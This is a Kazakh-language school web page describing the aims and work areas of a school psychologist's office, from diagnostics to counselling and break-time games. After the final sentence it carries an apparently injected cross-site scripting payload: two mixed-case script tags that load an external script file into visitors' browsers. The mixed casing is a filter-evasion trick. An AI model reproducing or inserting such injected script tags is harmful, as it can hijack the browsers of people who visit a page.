Психолог кабинеті - педагогикалық процестің барлық қатысушылары үшін психологиялық жайлы атмосфераны және эмоционалдық әл-ауқатты қамтамасыз ету үшін функционалдық тұрғыдан белгілі бір мақсаттарға қызмет ететін арнайы бөлме. Психолог кабинетінің негізгі жұмыс бағыттары: 1. Психологиялық профилактика. Мақсаты: тұлғаның психикалық және тұлғалық дамуында кездесетін сәтсіздіктерге ескерту жасау. 2. Психологиялық диагностика. Мақсаты: тұлғаның жеке және жас ерекшелігін, сондай-ақ тұлғааралық өзара әрекет ерекшеліктерін зерттеу. 3. Психотүзету және дамыту. Мақсаты: оқушының психикалық және тұлғалық дамуындағы ауытқуларды болдырмау, жалпы оқу бағдарламасымен біліктілікті дамыту. 4. Психологиялық консультация. Мақсаты: педагогикалық процесстің субъектілеріне кеңес беру. 5. Психологиялық білімді көтеру. Мақсаты: педагогикалық үрдіске қатысушылардың психологиялық мәдениетін көтеру. Педагог – психолог оқушылардың көңіл күйін қалыптастыру мақсатында оқушылармен 15 минуттық қоңырау «Көңілді үзіліс» кезінде түрлі әдістер арқылы ойын ойнатып, «Біртұтас тәрбие» бағдарлама жобасы аясында ұлттық нақышта ойындар ойнатуда.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

Просмотров: 1559


Пікір қосу



Деректерді қолтаңбаға қосу